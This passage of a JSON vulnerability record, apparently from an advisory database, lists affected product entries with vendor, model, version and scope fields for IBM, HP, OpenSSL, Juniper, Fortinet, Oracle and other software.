        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1"
      },
      {
        "model": "smartcloud entry",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.2"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.2"
      },
      {
        "model": "fortiddos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "4.1.5"
      },
      {
        "model": "secure backup",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "10.2.0.2"
      },
      {
        "model": "linux enterprise server sp4 ltss",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "10"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70007.2.0.3"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1"
      },
      {
        "model": "security network intrusion prevention system gx4004-v2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.4"
      },
      {
        "model": "rational requisitepro",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.3.16"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.1.2"
      },
      {
        "model": "sdk for node.js",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1.0.5"
      },
      {
        "model": "san volume controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1"
      },
      {
        "model": "systems insight manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.1.1"
      },
      {
        "model": "project openssl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "1.0.1"
      },
      {
        "model": "rational team concert",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.0.6"
      },
      {
        "model": "security network intrusion prevention system gv1000",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.4"
      },
      {
        "model": "db2 connect application server edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.5"
      },
      {
        "model": "hp-ux b.11.00",
        "scope": null,
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "hp-ux b.11.31",
        "scope": null,
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.3.13"
      },
      {
        "model": "storwize",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v37007.5.0.3"
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.03"
      },
      {
        "model": "forticlient ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "5.2.1"
      },
      {
        "model": "version control repository manager",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.5.0"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.3"
      },
      {
        "model": "linux s/390",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "linux x86 64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "slackware",
        "version": "14.0"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.0.1.0"
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.41"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.0.19"
      },
      {
        "model": "forticlient android",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "5.2.6"
      },
      {
        "model": "db2 connect application server advanced edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.1"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.1.10"
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.19"
      },
      {
        "model": "project openssl 1.0.1j",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "project openssl f",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "0.9.8"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3.1"
      },
      {
        "model": "cloudbridge",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "0"
      },
      {
        "model": "general parallel file system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v50007.4"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v37006.4.1.8"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.7"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6.3"
      },
      {
        "model": "hp-ux b.11.23.07.04",
        "scope": null,
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v35007.2.0.3"
      },
      {
        "model": "version control repository manager",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.5.1"
      },
      {
        "model": "abyp-0t-0s-4l-p",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "system networking rackswitch g8052",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.9.14.0"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v50007.1.0.7"
      },
      {
        "model": "initiate master data service patient hub",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.5"
      },
      {
        "model": "security network intrusion prevention system gx6116",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3"
      },
      {
        "model": "contactoptimization",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.3"
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.14"
      },
      {
        "model": "flashsystem 9840-ae1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "840"
      },
      {
        "model": "systems insight manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6.3.0"
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.14"
      },
      {
        "model": "junos 12.3x48-d10",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70007.3.0.5"
      },
      {
        "model": "project openssl 1.0.1d",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "system networking rackswitch g8316",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.9.15.0"
      },
      {
        "model": "security access manager for web",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1.2"
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.13"
      },
      {
        "model": "abyp-2t-2s-0l-p-m",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.1"
      },
      {
        "model": "secure backup",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "10.1.0.3"
      },
      {
        "model": "abyp-4tl-p-m",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "security network controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.0.3381"
      },
      {
        "model": "rational software architect",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1"
      },
      {
        "model": "personal communications",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.6"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70007.1.0.6"
      },
      {
        "model": "linux x86 64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "slackware",
        "version": "13.1"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v37007.1.0.7"
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.3.6"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v35007.1.0.6"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.0.1.1"
      },
      {
        "model": "abyp-4ts-p",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "security network intrusion prevention system gv200",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.2"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6.2"
      },
      {
        "model": "websphere mq for hp nonstop",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.3"
      },
      {
        "model": "security directory server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.3.1"
      },
      {
        "model": "elastic storage server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.5"
      },
      {
        "model": "db2 advanced enterprise server edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.1"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v50007.5.0.2"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v37006.2"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.12"
      },
      {
        "model": "matrix operating environment",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2.1"
      },
      {
        "model": "junos 12.1x46-d40",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "infosphere information server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.5"
      },
      {
        "model": "security access manager for mobile",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1.3"
      },
      {
        "model": "personal communications",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.0.2"
      },
      {
        "model": "linux x86 64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "slackware",
        "version": "13.0"
      },
      {
        "model": "secure backup",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "10.3.0.3"
      },
      {
        "model": "junos 12.3r11",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "elastic storage server",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.5.4"
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.3"
      },
      {
        "model": "smartcloud entry fix pack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.2.09"
      },
      {
        "model": "tivoli monitoring",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.32"
      },
      {
        "model": "db2\u00ae connect? unlimited edition for system z\u00ae",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.1"
      },
      {
        "model": "linux arm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "security access manager for web",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.02"
      },
      {
        "model": "rational team concert",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.0.1"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v50006.1"
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.0.1"
      },
      {
        "model": "linux enterprise server sp1 ltss",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "11"
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1"
      },
      {
        "model": "security network intrusion prevention system gx3002",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.1"
      },
      {
        "model": "secure backup",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "10.1.0.2"
      },
      {
        "model": "secure backup",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "10.1.0.1"
      },
      {
        "model": "worklight consumer edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.1.0.1"
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.18"
      },
      {
        "model": "websphere mq",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.0"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.0.13"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.07"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.1.1"
      },
      {
        "model": "security network intrusion prevention system gx5208-v2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3"
      },
      {
        "model": "security network intrusion prevention system gx7412-10",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6"
      },
      {
        "model": "security network intrusion prevention system gv200",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.1"
      },
      {
        "model": "db2 advanced workgroup server edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.1"
      },
      {
        "model": "san volume controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.4"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.10"
      },
      {
        "model": "abyp-10g-2sr-2lr-1-p",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "junos 13.3r7",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "rational team concert",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.0.1.5"
      },
      {
        "model": "systems insight manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3.2"
      },
      {
        "model": "power hmc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.1.0.0"
      },
      {
        "model": "rational team concert",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.0.1"
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.13"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.0"
      },
      {
        "model": "insight control server provisioning",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.4.1"
      },
      {
        "model": "junos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "12.1x47"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.1.5"
      },
      {
        "model": "secure backup",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "10.2.0.3"
      },
      {
        "model": "tivoli monitoring",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.3.0.1"
      },
      {
        "model": "rational developer for system z",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.0.1.4"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.8"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v50007.1"
      },
      {
        "model": "security network intrusion prevention system gx6116",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.5"
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.25"
      },
      {
        "model": "rational developer for i",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1.1.1"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.0.8"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70007.1"
      },
      {
        "model": "junos 15.1x49-d10",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6.2.0"
      },
      {
        "model": "insight control",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.5.1"
      },
      {
        "model": "tivoli endpoint manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.2"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3.3.1"
      },
      {
        "model": "security access manager for mobile",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.0"
      },
      {
        "model": "forticache",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "3.0"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v37006.4"
      },
      {
        "model": "security network controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.0.3376"
      },
      {
        "model": "security network intrusion prevention system gx5208",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6"
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.010"
      },
      {
        "model": "server migration pack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.5"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.2"
      },
      {
        "model": "linux x86 64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "slackware",
        "version": "13.37"
      },
      {
        "model": "security network intrusion prevention system gx4004-v2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6"
      },
      {
        "model": "secure backup",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "10.41"
      },
      {
        "model": "db2\u00ae advanced workgroup server edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.5"
      },
      {
        "model": "abyp-4t-0s-0l-p",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "secure backup",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "10.3.0.2"
      },
      {
        "model": "security network intrusion prevention system gx5008-v2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.2"
      },
      {
        "model": "db2 advanced enterprise server edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.7"
      },
      {
        "model": "cloud manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3"
      },
      {
        "model": "virtual connect enterprise manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6.1"
      },
      {
        "model": "worklight enterprise edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.1.0.2"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.0.2"
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.23"
      },
      {
        "model": "junos 14.1r5",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v50006.3"
      },
      {
        "model": "security network intrusion prevention system gx7800",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.2"
      },
      {
        "model": "websphere mq",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.2"
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.11"
      },
      {
        "model": "security network intrusion prevention system gx6116",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.4"
      },
      {
        "model": "insight control",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.5"
      },
      {
        "model": "initiate master data service",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.0"
      },
      {
        "model": "workload deployer if9",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.1.0.7"
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.11"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.1.2"
      },
      {
        "model": "san volume controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.4"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.9.5"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v37007.3"
      },
      {
        "model": "storwize",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v35007.3.0.12"
      },
      {
        "model": "project openssl 1.0.1k",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "smartcloud entry fix pack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.2.010"
      },
      {
        "model": "rational application developer for websphere software",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1.0.1"
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.9"
      },
      {
        "model": "version control agent",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3.2"
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0"
      },
      {
        "model": "campaign",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1.1"
      },
      {
        "model": "security network intrusion prevention system gx5208-v2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.5"
      },
      {
        "model": "flashsystem 9848-ac0",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v840"
      },
      {
        "model": "project openssl 0.9.8o",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "worklight foundation consumer edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.2.0.1"
      },
      {
        "model": "sdk for node.js",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1.0.2"
      },
      {
        "model": "datapower gateways",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.0.7"
      },
      {
        "model": "linux -current",
        "scope": null,
        "trust": 0.3,
        "vendor": "slackware",
        "version": null
      },
      {
        "model": "project openssl e",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "0.9.8"
      },
      {
        "model": "project openssl 1.0.1b",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "tealeaf customer experience",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.0.2"
      },
      {
        "model": "cloud orchestrator enterprise edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.5"
      },
      {
        "model": "server migration pack",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.5.1"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "slackware",
        "version": "13.1"
      },
      {
        "model": "junos 12.3r9",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v35006.2"
      },
      {
        "model": "datapower gateways",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.0.0.16"
      },
      {
        "model": "rational team concert",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.0.1.2"
      },
      {
        "model": "san volume controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.3"
      },
      {
        "model": "campaign",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1"
      },
      {
        "model": "version control repository manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2.1"
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.33"
      },
      {
        "model": "systems insight manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.4"
      },
      {
        "model": "sterling connect:enterprise for unix ifix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.5.0.37"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v35001.1"
      },
      {
        "model": "security access manager for mobile",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1"
      },
      {
        "model": "db2 purescale feature for enterprise server edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.8"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70007.2.0.5"
      },
      {
        "model": "security network intrusion prevention system gx7412",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3"
      },
      {
        "model": "security network intrusion prevention system gx4004",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.2"
      },
      {
        "model": "systems insight manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "4.2"
      },
      {
        "model": "matrix operating environment",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3.1"
      },
      {
        "model": "rational team concert",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.0.6"
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1.7"
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.12"
      },
      {
        "model": "worklight enterprise edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.1.0.1"
      },
      {
        "model": "secure backup",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "10.3.0.1.0"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "slackware",
        "version": "13.0"
      },
      {
        "model": "system networking rackswitch g8124",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.11.4.0"
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.212"
      },
      {
        "model": "websphere mq",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.0.7"
      },
      {
        "model": "infosphere master data management standard/advanced edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "11.4"
      },
      {
